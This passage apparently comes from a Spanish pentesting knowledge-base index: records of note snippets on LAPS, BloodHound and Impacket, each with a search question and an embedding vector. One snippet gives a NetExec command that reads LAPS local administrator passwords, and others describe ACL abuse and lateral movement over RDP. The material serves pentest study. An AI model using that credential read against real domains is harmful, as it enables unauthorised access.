-0.12002, 0.05416, -0.00967, 0.00651, 0.04686, 0.01865, 0.06657, -0.0159, -0.03918, -0.0022, 0.03864, -0.0544, 0.00798, 0.02755, -0.01243, 0.00711, 0.02236, 0.02898, -0.0359, -0.02473, -0.00793, -0.04082, -0.04741, -0.02239, -0.00186, -0.04727, -0.02498, 0.08134, 0.09148, -0.10631, 0.03054, -0.00058, 0.08088, -0.04106, -0.01619, 0.07592, -0.00708, -0.05773, -0.05509, -0.00629, -0.00034, -0.00189, -0.04337, 0.00873, 0.02907, 0.05196, 0.05787, 0.02283, -0.05439, 0.0209, 0.01006, 0.05045, 0.04225, -0.03095, 0.04349, -0.04184, 0.00326, 0.00673, -0.05693, 0.00429, -0.04189, -0.0222, -0.0704, -0.01701, 0.11268, 0.00556, -0.04478, -0.08509, -0.02606, -0.08763, 0.01487, -0.01061, 0.02449, -0.01553, -0.00179, 0.02881, 0.0109, -0.01994, 0.02773]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o:\nnxc ldap IP -u usuario -p password -M laps\n```\n- El atributo es `ms-Mcs-AdmPwd` (LAPS v1).", "indexar": "Necesito una herramienta que permita administrar el atributo ms-Mcs-AdmPwd en Windows.", "v": [-0.01807, 0.03693, 0.01433, -0.19063, 0.00746, 0.07693, -0.17122, -0.04689, -0.22852, -0.00265, 0.0079, -0.10215, 0.02703, -0.10552, 0.01618, -0.00922, 0.08191, -0.12696, 0.04107, 0.13606, 0.19358, -0.04451, -0.11217, 0.01173, -0.07806, 0.09296, 0.10452, 0.00703, -0.19104, 0.04163, -0.02725, 0.06669, -0.07599, -0.0983, -0.03937, -0.06982, -0.09783, 0.10512, -0.00726, 0.17759, 0.00684, 0.14718, -0.097, 0.13123, 0.0427, -0.03722, 0.01911, 0.02077, 0.02459, 0.0818, -0.00666, -0.12826, -0.13305, -0.01172, 0.08159, -0.04654, 0.16588, -0.0745, -0.06498, 0.03308, -0.10322, 0.13132, -0.06801, 0.05923, -0.08791, 0.00938, 0.08728, -0.07967, -0.03155, 0.08938, -0.05277, -0.07273, 0.10303, -0.02674, 0.02158, 0.00774, -0.00975, -0.01184, 0.17329, -0.02912, -0.03037, 0.03359, -0.02604, -0.05381, -0.08191, -0.18449, 0.06086, 0.00101, 0.06694, -0.0416, 0.00713, -0.0182, -0.02916, -0.01018, -0.01079, -0.06105, -0.00011, -0.0409, 0.06976, 0.05587, 0.04354, -0.07727, -0.10148, 0.05541, -0.044, 0.08417, -0.02862, -0.06227, -0.07323, 0.02392, 0.07812, 0.0204, -0.05277, 0.03177, 0.03334, 0.07016, -0.0325, -0.08748, -0.00166, -0.02844, 0.01692, 0.01985, 0.04283, -0.0134, 0.00556, -0.04886, -0.06853, 0.04537, -0.04824, -0.00806, 0.0371, -0.02663, -0.07489, -0.05596, -0.07915, 0.05919, 0.04068, 0.00247, 0.01461, -0.04623, -0.03012, -0.03027, 0.02162, -0.0632, 0.03154, 0.04058, 0.03281, 0.03972, -0.05183, 0.00595, 0.05551, -0.03948, -0.00066, -0.02549, -0.03622, 0.04644, -0.02362, 0.08726, -0.01893, -0.02404, 0.00078, -0.05685, 0.0677, 0.01459, 0.02469, -0.06577, 0.03331, 0.06651, 0.00289, -0.03565, 0.0401, 0.00463, 0.00271, -0.00349, -0.00018, -0.02053, 0.01369, -0.00576, -0.0281, -0.01678, -0.05301, 0.01041, -0.00101, 0.0164, 0.00411, -0.02819, -0.0429, 0.04265, -0.03677, -0.01451, -0.01426, -0.02065, 0.08815, -0.04134, -0.00506, 0.0531, 0.00192, -0.07461, -0.00627, 0.0416, -0.01805, -0.04511, -0.05494, -0.0721, 0.0759, 0.0084, -0.0105, 0.04319, 0.02306, 9e-05, 0.02469, 0.02437, -0.03018, -0.05353, 0.00329, -0.05753, 0.02292, 0.02833, -0.00582, -0.07263, 0.02577, 0.03984, 0.03513, -0.00547, 0.04133, -0.01171, -0.0356, 0.03303, -0.00252, -0.01342, 0.02457, -0.02536, 0.01884, 0.01427, 0.07902, -0.07336, -0.00641, -0.11318, -0.03544, 0.00603, 0.01108, -0.00647, -0.00649, -0.06005, -0.03094, -0.04308, -0.02511, -0.02692, -0.06275, -0.06781, -0.01969, -0.01669, 0.03842, -0.03785, 0.00157, 0.03039]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o:\nnxc ldap IP -u usuario -p password -M laps\n```\n- El atributo es `ms-Mcs-AdmPwd` (LAPS v1).", "indexar": "ΒΏExiste software gratuito para realizar la rotaciΓ³n automΓ‘tica de contraseΓ±as en mΓ‘quinas virtuales?", "v": [0.17067, 0.00555, -0.08574, -0.16168, -0.04263, -0.0472, -0.04906, -0.08583, -0.04537, -0.1218, -0.03976, -0.13794, 0.08194, -0.05837, 0.12407, 0.07889, 0.09424, -0.0786, 0.00149, 0.1575, 0.02227, -0.14281, -0.08084, 0.00123, 0.02423, 0.09762, -0.01211, -0.02958, -0.19073, 0.0513, 0.10699, 0.03426, 0.09547, -0.059, -0.00084, -0.02112, 0.09003, 0.07558, 0.10292, 0.02269, 0.16585, 0.07403, -0.0963, 0.01266, 0.11891, -0.00664, 0.08384, 0.01698, 0.01778, 0.0002, -0.04596, -0.0943, 0.00381, -0.12439, 0.04263, -0.18339, 0.21328, -0.04222, -0.00299, -0.06902, -0.01768, 0.09946, -0.00278, 0.08921, -0.0693, 0.00146, 0.09516, -0.06847, -0.11439, 0.06272, -0.0352, -0.02037, 0.01033, 0.03669, 0.04226, -0.04487, -0.02698, 0.05808, -0.01828, 0.1337, -0.07373, 0.0151, 0.02503, -0.01411, -0.02671, -0.00083, 0.00549, -0.05286, 0.1223, -0.04206, 0.06008, 0.03019, 0.02197, 0.07737, 0.07793, -0.03339, 0.02691, 0.02736, -0.06691, 0.06415, -0.02846, 0.01329, 0.0169, 0.11054, -0.08579, 0.02337, 0.01187, -0.00785, -0.01042, -0.05786, 0.06204, 0.02366, -0.04466, -0.0757, 0.00226, -0.03829, 0.04531, -0.00204, 0.06682, -0.00946, 0.03149, 0.0103, 0.0259, -0.08744, 0.01486, 0.02342, 0.00835, 0.11803, -0.07095, -0.06694, 0.07136, -0.08326, -0.10537, -0.06313, -0.06135, 0.02995, 0.0922, -0.06837, -0.06025, -0.07221, -0.02867, 0.04155, -0.05252, -0.04814, 0.08267, 0.01755, 0.07221, -0.06639, 0.01804, 0.0111, 0.05115, -0.00244, 0.05503, 0.09991, -0.01876, 0.04932, -0.03458, -0.04879, -0.07128, 0.07912, -0.0074, -0.0176, -0.05353, -0.01883, -0.10497, 0.00213, -0.00643, 0.02921, 0.01088, 0.03873, -0.00877, 0.06836, 0.01682, -0.01008, -0.05297, 0.05087, 0.02057, -0.05841, 0.03208, -0.10114, -0.03517, 0.00301, 0.01872, -0.1102, -0.03576, 0.019, 0.04123, -0.01242, 0.04764, 0.03018, 0.03317, -0.01475, -0.07076, -0.04242, 0.07011, -0.02372, -0.05752, 0.01039, 0.00136, -0.03438, -0.05778, -0.02698, -0.06637, -0.02663, 8e-05, 0.08335, -0.02239, -0.00402, -0.04589, 0.03054, 0.02, 0.02428, -0.01016, -0.04609, -0.02083, -0.01622, 0.01222, -0.01484, -0.06965, -0.04907, 0.02619, -0.05972, 0.03264, 0.05233, 0.01984, 0.02401, 0.0632, 0.11121, 0.05213, -0.01599, -0.02265, 0.03965, 0.00503, -0.04065, 0.04932, 0.02833, 0.01744, -0.02234, -0.04026, -0.02178, -0.01836, 0.05172, 0.01607, -0.0712, -0.07238, -0.02597, -0.04317, -0.03358, 0.00044, -0.01022, -0.08101, 0.04729, -0.02233, 0.0131, -0.03334, 0.01924]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo saber quiΓ©n puede leerlo\nBloodHound muestra `ReadLAPSPassword` como arista β†’ relacionado con ACL abuses.", "indexar": "que herramienta sirve para ver quΓ© usuarios tienen permiso de lectura en Active Directory?", "v": [-0.09508, 0.14973, -0.16763, -0.2637, 0.01883, -0.10118, -0.15136, -0.06709, -0.02477, -0.12096, 0.00205, -0.13101, 0.01668, -0.12633, 0.10877, -0.07123, 0.13352, -0.05113, 0.02537, -0.06958, 0.01865, 0.04403, -0.13641, 0.0373, -0.05959, 0.03415, 0.03512, -0.1144, -0.06239, 0.06089, -0.01886, -0.0116, 0.01605, -0.06204, -0.00392, -0.05693, -0.02252, 0.03945, 0.06805, 0.12561, 0.00734, 0.09641, -0.11844, 0.03832, 0.02303, 0.08852, -0.01433, -0.05303, -0.0381, 0.12363, -0.04329, -0.11517, -0.06649, -0.02098, 0.00991, -0.04154, 0.10734, -0.11855, -0.01292, -0.16456, -0.15252, -0.02152, -0.02981, -0.07519, -0.04275, -0.07441, 0.11661, -0.00487, -0.08961, 0.12027, -0.05497, 0.02864, 0.07111, 0.0884, -0.00649, -0.02529, 0.00794, -0.02256, -0.02363, 0.02451, 0.17271, 0.0134, -0.09517, -0.10762, -0.06028, -0.13103, 0.04623, -0.06088, 0.07308, -0.0095, 0.01978, 0.13719, -0.01085, 0.00571, 0.03582, 0.0181, 0.04307, -0.06296, 0.0066, 0.04247, 0.12513, -0.06161, 0.0009, 0.08399, -0.03929, -0.00868, -0.08996, 0.00456, -0.08906, 0.03261, 0.10251, -0.00941, 0.02479, -0.05403, 0.05492, 0.10819, -0.03949, -0.1087, -0.0115, -0.01373, -0.05822, -0.01429, -0.02747, -0.00455, 0.04481, 0.02131, -0.00638, 0.10191, -0.02521, -0.07089, 0.01169, -0.05143, -0.04155, 0.00239, -0.0584, -0.05517, -0.00864, -0.08103, -0.0923, -0.04072, 0.012, -0.02413, -0.04204, 0.00343, -0.0236, -0.05529, 0.05581, 0.02675, -0.02987, -0.04267, -0.00891, -0.04195, -0.02832, -0.00132, 0.00296, 0.08937, -0.05502, -0.01156, -0.08958, -0.00856, -0.04135, -0.04187, 0.03105, -0.00666, -0.03456, -0.03503, -0.05445, -0.00085, 0.10405, 0.08125, -0.03569, 0.03273, 0.02718, -0.06741, 0.03218, -0.07443, -0.03261, 0.05277, -0.0116, -0.04175, -0.05146, -0.0546, -0.04877, -0.01386, -0.01915, -0.03557, 0.01283, -0.09323, 0.01843, 0.02965, -0.032, 0.0951, 0.03023, -0.05927, 0.03756, -0.02096, -0.01719, -0.00518, 0.06747, -0.11688, -0.01617, 0.04104, 0.01991, 0.02284, 0.07056, -0.01325, -0.00166, 0.05019, 0.02168, -0.00286, -0.00407, 0.01031, 0.04373, 0.0238, -0.0479, -0.00956, -0.01751, 0.01178, -0.01452, -0.00616, 0.02152, -0.03787, 0.02224, 0.02285, 0.02068, 0.03143, -0.00111, -0.0508, 0.01519, 0.05626, 0.02599, -0.0474, -0.00033, 0.03062, 0.00582, -0.06556, 0.02055, 0.01217, 0.00011, -0.01013, -0.0333, 0.05721, 0.01805, -0.01717, -0.02945, -0.01295, 0.00444, -0.013, -0.06949, -0.05314, -0.0237, -0.03513, 0.02443, -0.05278, 0.01851, 0.00089]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo saber quiΓ©n puede leerlo\nBloodHound muestra `ReadLAPSPassword` como arista β†’ relacionado con ACL abuses.", "indexar": "cual programa puedo usar para mapear las relaciones de acceso entre usuarios y mΓ‘quinas?", "v": [-0.05216, 0.10068, -0.04473, -0.28768, -0.14895, -0.09962, -0.02674, -0.0158, -0.14987, -0.05316, -0.10228, -0.10055, 0.05013, -0.03113, -0.01851, -0.00898, 0.15972, 0.02207, 0.07608, -0.01951, 0.03848, -0.02997, -0.06984, 0.00213, -0.12979, 0.1944, 0.07825, -0.1489, -0.14123, -0.03246, -0.00712, -0.01204, 0.05677, -0.04132, -0.04969, -0.09976, 0.08157, 0.06185, 0.06084, 0.05718, -0.00224, -0.12428, -0.1224, -0.03247, 0.16459, 0.05891, -0.00672, 0.00254, -0.00653, -0.00411, -0.11603, -0.05831, -0.03984, 0.00431, 0.00916, -0.12418, 0.13211, -0.02834, 0.0186, 0.00747, -0.10214, -0.02531, -0.02496, 0.00698, -0.00883, -0.07025, 0.09723, 0.01057, -0.14084, 0.1005, -0.02926, 0.0841, 0.0315, -0.01764, 0.04569, 0.06289, 0.01364, -0.01615, -0.00751, -0.0295, -0.0568, 0.02182, -0.02278, 0.01414, -0.02634, 0.0189, 0.12232, -0.03011, 0.04864, -0.04345, 0.04769, 0.13824, 0.0237, -0.01516, 0.13453, -0.09135, -0.02644, -0.01743, 0.01647, -0.01172, 0.10079, 0.01903, -0.02613, 0.14876, -0.11946, -0.01427, 0.07932, -0.00822, -0.00492, 0.01731, 0.05519, 0.00313, -0.06799, -0.07386, -0.11139, 0.01936, -0.01696, -0.00664, -0.00314, -0.13533, -0.07532, 0.02449, 0.02429, -0.0263, 0.11212, 0.04936, 0.09012, 0.10214, -0.08238, 0.02341, -0.00043, -3e-05, -0.06439, -0.03913, 0.00239, -0.08455, 0.02494, -0.03615, -0.01198, 0.00482, 0.01373, 0.07225, -0.08081, -0.05823, -0.01094, 0.01157, 0.0071, -0.06551, 0.00528, -0.04557, 0.06607, -0.01436, -0.05083, 0.04328, -0.01031, 0.02361, -0.02211, -0.01368, -0.08092, -0.05879, -0.06568, 0.00672, -0.01372, 0.02208, 0.08407, 0.00081, -0.01352, 0.02188, 0.02716, 0.03116, 0.02679, 0.04677, 0.05041, 0.00993, -0.00031, 0.00491, 0.02358, -0.01491, 9e-05, -0.00665, -0.00249, -0.02177, 0.0504, -0.00765, -0.05755, 0.03476, -0.05046, 0.02324, 0.02397, -0.01104, -0.06524, 0.05973, 0.04997, -0.01914, 0.08853, -0.04005, 0.01751, 0.07498, -0.0326, -0.04263, 0.01224, 0.00373, -0.0192, 0.0254, 0.02998, 0.07739, 0.00908, -0.09254, 0.02956, 0.01434, 0.03679, -0.02595, 0.00583, -0.00716, -0.06618, -0.03363, -0.02316, 0.04503, 0.06973, -0.04797, -0.00286, -0.03451, -0.00823, 0.03191, 0.05704, -0.07086, 0.02985, -0.00597, 0.00742, -0.03026, -0.01489, -0.03346, 0.02006, -0.05546, 0.00572, -0.02825, 0.02193, -0.09043, 0.02863, -0.08846, 0.00116, 0.08481, 0.02381, -0.03358, -0.09908, 0.03475, -0.00797, -0.04945, -0.08263, 0.00024, -0.00903, 0.00779, 0.04193, -0.01728, 0.01422, 0.09816]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo saber quiΓ©n puede leerlo\nBloodHound muestra `ReadLAPSPassword` como arista β†’ relacionado con ACL abuses.", "indexar": "con que puedo detectar abusos de control de acceso basados en permisos de lectura?", "v": [0.18946, 0.10922, -0.16386, -0.20652, 0.04475, 0.05145, -0.07085, 0.05116, -0.11701, -0.02341, -0.03353, 0.03453, -0.12273, 0.03351, 0.06103, -0.11878, 0.05485, 0.06045, -0.01882, -0.03812, 0.10106, -0.09357, 0.02613, 0.10101, -0.02004, -0.01636, -0.01027, -0.1477, 0.042, -0.03777, -0.13207, -0.01258, 0.00483, 0.04517, 0.00024, -0.00779, -0.11205, 0.06273, 0.06779, 0.07037, 0.12229, 0.05385, -0.08986, -0.02478, 0.04661, -0.05154, -0.04591, 0.02248, -0.15431, -0.02779, -0.02405, -0.04911, -0.14951, -0.11614, -0.05564, -0.00927, 0.10056, 0.0238, 0.07041, -0.02071, -0.08743, -0.02423, 0.11544, 0.03629, 0.072, -0.05631, 0.08786, 0.05387, -0.06934, 0.07867, -0.02648, -0.03232, 0.03959, 0.07428, -0.0042, 0.01037, -0.11538, -0.03158, 0.09553, -0.04796, 0.02247, 0.00307, -0.1007, -0.02948, -0.02887, -0.03105, 0.02108, -0.08041, 0.04196, -0.0997, 0.03105, 0.04839, 0.02779, -0.06896, -0.02072, -0.05695, -0.04557, -0.02664, -0.03454, 0.0668, 0.05433, -0.02364, 0.01861, 0.15268, 0.05931, -0.01128, -0.01972, -0.07469, 0.00679, -0.09587, -0.02657, 0.04015, -0.02657, -0.01935, -0.03379, 0.05552, -0.00504, -0.0465, -0.0211, -0.09113, -0.06266, -0.08132, -0.0238, 0.02886, 0.1001, -0.06576, 0.00973, 0.09795, -0.00047, -0.00743, 0.08058, 0.03372, -0.00409, 0.03897, -0.06343, -0.03649, -0.05651, 0.01411, -0.1373, 0.01276, 0.00769, 0.10294, 0.02137, 0.07476, 0.02891, -0.01187, -0.04612, 0.04007, -0.00592, -0.09582, -0.00295, -0.01418, 0.00556, 0.04337, 5e-05, 0.06941, -0.0563, -0.04817, -0.03202, 0.04941, -0.0408, 0.0203, -0.05111, 0.06535, 0.07335, 0.00176, -0.00081, -0.05471, 0.02224, 0.00214, -0.13679, 0.03753, 0.0205, -0.01269, 0.07214, -0.08333, -0.0556, -0.00584, -0.03881, -0.05617, -0.10353, -0.01228, -0.08984, -0.0743, -0.04632, 0.0223, -0.07758, -0.03248, 0.01599, 0.02471, 0.07803, 0.09739, 0.04698, -0.01153, 0.02897, -0.02379, -0.04496, 0.08701, 0.04025, -0.06444, 0.04377, 0.00375, -0.0256, -0.01081, 0.03811, -0.0654, 0.0459, 0.06757, -0.02452, -0.02451, 0.06145, -0.01576, 0.05046, -0.05982, -0.13249, -0.01257, -0.04412, -0.02759, 0.01884, -0.02373, 0.03585, 0.03216, 0.11165, 0.02265, 0.00608, -0.07777, 0.03152, -0.04899, 0.07647, 0.11547, 0.03371, 0.02267, -0.04393, -0.02936, -0.04532, -0.04202, -0.01156, -0.03955, -0.0223, -0.02301, 0.00808, 0.04934, 0.05051, -0.03917, -0.01958, -0.05068, -0.09886, -0.01315, -0.04961, -0.03496, 0.0062, 0.04154, 0.05639, -0.05791, 0.06327, -0.04924]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nPassword de admin local de esa mΓ‘quina β†’ Movimiento lateral / RDP.\n\nRelacionado: BloodHound Β· OSCP MOC", "indexar": "que herramienta sirve para obtener el password de administrador local de una mΓ‘quina?", "v": [0.02527, 0.08346, -0.13179, -0.30921, -0.07107, -0.14518, -0.07618, -0.0851, -0.0634, -0.01895, -0.07842, -0.02753, 0.06296, -0.05521, 0.04965, 0.01313, 0.14537, -0.11281, 0.00547, 0.13189, 0.04579, 0.06449, -0.01157, 0.04295, -0.04698, 0.06771, 0.1144, -0.05666, -0.24397, 0.03373, 0.0244, -0.00541, -0.02082, -0.06406, -0.03908, -0.03447, 0.03668, 0.09362, -0.03652, 0.11877, 0.02007, 0.01233, -0.12905, 0.11046, 0.0787, 0.05765, 0.01007, -0.01555, 0.11661, 0.12295, -0.12154, -0.19779, -0.07049, -0.02406, 0.05652, -0.11631, 0.12925, -0.09448, 0.03053, -0.07609, -0.17417, -0.03237, -0.08677, 0.04212, -0.08283, -0.03476, 0.07215, -0.05996, -0.03461, 0.03379, -0.05767, -0.01417, -0.01655, 0.00573, 0.00721, 0.00764, 0.05141, 0.09153, 0.07198, -0.01384, 0.03641, 0.00135, -0.07864, -0.06006, -0.10949, -0.08046, 0.06439, -0.08063, 0.08597, -0.05951, 0.00319, 0.03697, 0.01228, -0.01732, 0.0611, -0.0416, 0.07539, -0.02, -0.06627, -0.01881, 0.106, -0.06471, -0.0101, 0.10759, -0.03109, 0.0154, 0.02613, 0.02957, -0.02735, -0.06195, 0.07616, -0.0117, -0.03192, 0.01564, -0.03615, 0.03546, -0.02652, -0.04045, -0.01677, 0.02426, 0.00484, 0.00647, 0.00579, -0.05721, -0.0054, 0.02904, -0.00459, 0.08017, -0.04915, -0.0686, 0.01111, -0.03116, -0.04478, 0.04599, -0.05945, 0.01104, 0.01971, -0.14009, -0.05522, -0.05943, -0.05452, 0.05793, -0.02287, -0.08121, 0.08725, 0.01125, 0.0378, -0.06964, -0.04859, -0.01098, 0.05039, -0.08839, 0.01364, 0.05467, -0.07975, 0.02928, -0.00628, -0.00582, -0.07082, 0.06534, -0.04935, -0.09236, 0.00337, 0.05825, -0.06225, -0.08652, -0.0121, 0.00078, 0.10533, 0.00135, -0.01273, 0.04033, 0.0547, 0.0229, 0.00496, -0.01422, -0.00971, -0.04927, 0.02284, -0.05292, 0.00637, 0.04645, -0.0319, 0.00107, -0.03632, -0.04347, 0.04078, -0.0181, -0.01877, 0.00541, 0.05946, -0.02685, -0.02929, -0.01803, 0.02445, -0.01888, -0.01329, -0.03079, 0.04429, -0.06486, -0.05959, -0.009, -0.05491, -0.01155, 0.0327, 0.06838, -0.00706, -0.06845, -0.03112, 0.02548, 0.01247, 0.03826, 0.01234, -0.00653, -0.03702, -0.06736, 0.022, 0.02612, -0.06081, -0.022, 0.05769, -0.03177, 0.02617, 0.02613, 0.00991, -0.0628, 0.01487, 0.02885, 0.03621, 0.01109, -0.02009, 0.03137, -0.01979, 0.0071, 0.06601, -0.05861, 0.03774, -0.04157, -0.0396, -0.04802, 0.001, 0.05365, 0.04581, -0.06303, -0.08951, -0.0192, -0.00879, -0.03985, -0.04093, -0.01485, -0.04531, -0.00452, 0.02978, 0.01254, 0.00211, 0.01258]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nPassword de admin local de esa mΓ‘quina β†’ Movimiento lateral / RDP.\n\nRelacionado: BloodHound Β· OSCP MOC", "indexar": "con que puedo hacer un movimiento lateral usando RDP?", "v": [-0.09806, 0.07948, -0.19399, -0.17959, -0.12421, 0.11903, -0.01475, 0.13963, -0.06253, 0.00606, 0.00954, -0.14131, 0.02849, -0.12591, -0.02035, -0.06313, -0.00664, 0.11355, -0.09283, -0.12406, -0.04036, -0.08883, -0.03297, -0.04671, 0.18636, 0.021, 0.03225, -0.0088, -0.06391, -0.0752, 0.00623, 0.05795, 0.00214, -0.07609, -0.07097, -0.07487, 0.09611, 0.05233, 0.09456, -0.01154, -0.08987, 0.0079, -0.15635, 0.01629, 0.00992, 0.11603, -0.06413, -0.04633, -0.08769, 0.00711, -0.00082, 0.0762, -0.09436, -0.08272, -0.03629, -0.02736, 0.16151, -0.05286, 0.05832, -0.0599, 0.08701, 0.07999, -0.02913, 0.03047, 0.01595, -0.10237, 0.00434, -0.07496, -0.03951, -0.01738, -0.04106, 0.03285, -0.04458, 0.05022, 0.0034, 0.10231, 0.00637, -0.04039, 0.05176, 0.05872, -0.09319, 0.05739, -0.09477, 0.06819, -0.0249, -0.10552, 0.04419, -0.06524, 0.07838, 0.00082, 0.04491, 0.04326, -0.0647, 0.04168, -0.01386, 0.03678, -0.11469, 0.05131, -0.06441, -0.01478, 0.09291, 0.05615, -0.1135, -0.08302, 0.07182, -0.11008, 0.12629, -0.02614, 0.0317, 0.03458, 0.0174, 0.01794, -0.08838, -0.04912, -0.00088, 0.00782, -0.164, -0.04044, -0.07006, 0.03671, 0.06049, -0.05839, -0.08003, -0.11364, 0.01223, -0.03905, 0.00318, 0.04413, -0.09603, 0.03624, 0.10147, 0.02905, -0.0619, -0.06948, -0.07266, -0.01948, 0.06762, 0.08448, 0.10617, -0.03035, 0.04129, 0.04025, 0.02873, -0.00168, 0.02559, 0.06161, 0.06514, -0.02401, -0.02355, 0.02327, 0.00896, -0.04177, -0.00109, -0.00088, 0.02244, 0.01809, -0.04637, -0.06132, -0.09006, 0.01601, -0.04764, 0.09021, -0.11536, -0.02299, 0.00961, -0.06974, -0.0177, 0.04168, 0.02884, -0.00849, -0.01706, 0.01869, 0.04899, -0.01146, 0.06434, 0.01329, -0.05674, -0.01279, 0.05795, 0.00638, -0.01908, 0.03211, 0.00929, -0.00735, 0.08838, 0.00257, 0.0535, -0.02862, 0.08493, 0.05766, -0.04248, 0.07607, 0.02014, -0.05042, -0.02901, -0.05579, 0.00048, -0.0573, 0.04026, 0.02541, -0.0531, -0.01049, 0.04508, -0.03943, 0.04755, -0.00188, -0.04178, 0.1168, 0.01516, -0.00982, 0.03199, -0.01837, 0.12324, 0.00715, -0.05514, 0.01974, -0.04429, 0.03378, -0.03288, -0.02144, 0.00827, 0.01219, 0.01183, 0.01741, 0.01597, 0.00417, 0.04871, 0.00546, -0.01814, 0.02027, 0.0431, 0.06786, 0.0187, -0.04271, 0.03523, 0.02347, 0.05576, 0.04066, -0.07669, -2e-05, 0.02953, -0.03415, -0.03778, 0.01587, 0.00528, -0.02925, -0.06449, 0.06451, 0.03827, -0.04258, 0.05047, -0.0004, 0.01547, -0.04434, 0.04116, 0.02752]} -{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nPassword de admin local de esa mΓ‘quina β†’ Movimiento lateral / RDP.\n\nRelacionado: BloodHound Β· OSCP MOC", "indexar": "cual es una alternativa libre a BloodHound?", "v": [-0.22526, 0.01245, 0.03959, 0.1202, -0.15361, 0.06934, -0.05054, -0.07863, -0.06053, -0.03184, -0.06114, -0.18835, -0.00906, 0.11894, 0.02936, -0.06668, -0.03467, -0.08258, 0.07832, -0.02518, -0.10733, -0.01479, -0.12433, 0.00088, -0.03648, -0.07061, 0.04296, 0.1709, -0.04818, -0.02327, -0.00211, -0.13266, 0.05983, 0.04461, -0.0355, 0.04017, 0.03865, 0.11913, 0.08835, 0.04089, 0.02059, -0.0689, 0.03248, -0.046, 0.00804, -0.04259, -0.07871, 0.07964, 0.06132, 0.07822, 0.02097, 0.08866, -0.15349, -0.05177, 0.0826, -0.01351, 0.07562, -0.17022, -0.08245, -0.02281, -0.01517, 0.00421, 0.06046, -0.03942, 0.01739, -0.00863, -0.04969, -0.00901, -0.0253, 0.12595, 0.04434, 0.01051, -0.03609, -0.02428, -0.11108, -0.00654, -0.03224, 0.00022, 0.0754, 0.02445, 0.04919, -0.02152, 0.0273, 0.02524, -0.01106, -0.0733, 0.1217, -0.08448, 0.06151, 0.11696, 0.07319, -0.02933, -0.02816, 0.15914, -0.03467, -0.12524, 0.0339, 0.05801, 0.04282, 0.01749, 0.07153, 0.06934, -0.18271, 0.03744, 0.06063, -0.04713, -0.09057, -0.01467, -0.07088, -0.01605, 0.01612, 0.05133, -0.03294, 0.07476, -0.02115, -0.07381, 0.09324, 0.09143, 0.07424, 0.00876, -0.05897, -0.00362, -0.0121, -0.05055, -0.03899, 0.00979, -0.01266, 0.00222, -0.05049, 0.04871, 0.01573, 0.07294, -0.07749, -0.13202, -0.12268, -0.00354, 0.03127, -0.02529, 0.05863, -0.04542, -0.03617, 0.00374, 0.07839, 0.02033, 0.00602, -0.03732, 0.00774, -0.08681, 0.00042, -0.00855, -0.04813, 0.0302, -8e-05, 0.12027, -0.04986, 0.00792, -0.03451, -0.00246, -0.07788, 0.09154, -0.01565, -0.05981, -0.02928, -0.0086, -0.08017, 0.10156, -0.01415, 0.0014, -0.09593, -0.02735, 0.05736, 0.04488, 0.04258, 0.00534, 0.02924, -0.08336, 0.00939, -0.15631, 0.01417, 0.0097, 0.04267, 0.03491, -0.12609, 0.01589, 0.04873, -0.05648, 0.01296, 0.00956, 0.03553, 0.00053, 0.02411, 0.0601, 0.01597, -0.06179, -0.04212, 0.02018, 0.05959, -0.10577, -0.00017, -0.04822, -0.04053, -0.03115, -0.05327, 0.0128, -0.00073, -0.00396, -0.02591, 0.06769, -0.05653, 0.04472, -0.0009, -0.00069, 0.06014, 0.0123, -0.01204, 0.02259, 0.01362, -0.05562, -0.05584, -0.00282, 0.06439, 0.03134, 0.00897, 0.01567, -0.05628, 0.04921, 0.02938, 0.0249, 0.02248, -0.01287, -0.01695, 0.04628, -0.04629, 0.03114, -0.01915, 0.08345, 0.03175, 0.01254, 0.00944, -0.01238, 0.09373, 0.06582, -0.02953, -0.05131, 0.00082, -0.04972, -0.06514, -0.01208, -0.02815, -0.04135, -0.01586, 0.01931, 0.03692, 0.02486, 0.04068, 0.00996]} -{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Impacket\n\n> Suite **Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) sin ser Windows. Es como tener un \"Windows hablante\" en Kali.", "indexar": "Que programa puedo usar para entender los protocolos de Windows como SMB y Kerberos desde Linux?", "v": [-0.0961, -0.05877, -0.05183, -0.1281, -0.05117, -0.22407, -0.13168, -0.00557, -0.09635, -0.1095, -0.06438, 0.0239, 0.0451, -0.18349, -0.03602, 0.01351, -0.08068, -0.14298, 0.04673, -0.02527, 0.01151, 0.07065, -0.1106, 0.00712, 0.03563, 0.04794, 0.09704, -0.12351, 0.08768, -0.00553, -0.13907, -0.00434, 0.03678, 0.00129, -0.02316, 0.06538, -0.0411, 0.12213, 0.11305, 0.13367, 0.07396, 0.00673, 0.04242, 0.06156, 0.03225, -0.09249, 0.06638, -0.10288, 0.05832, -0.14388, 0.03078, 0.03371, -0.04206, -0.00065, 0.03019, -0.01354, 0.12947, -0.15475, -0.03874, 0.08014, -0.08775, 0.02797, -0.01178, -0.02062, 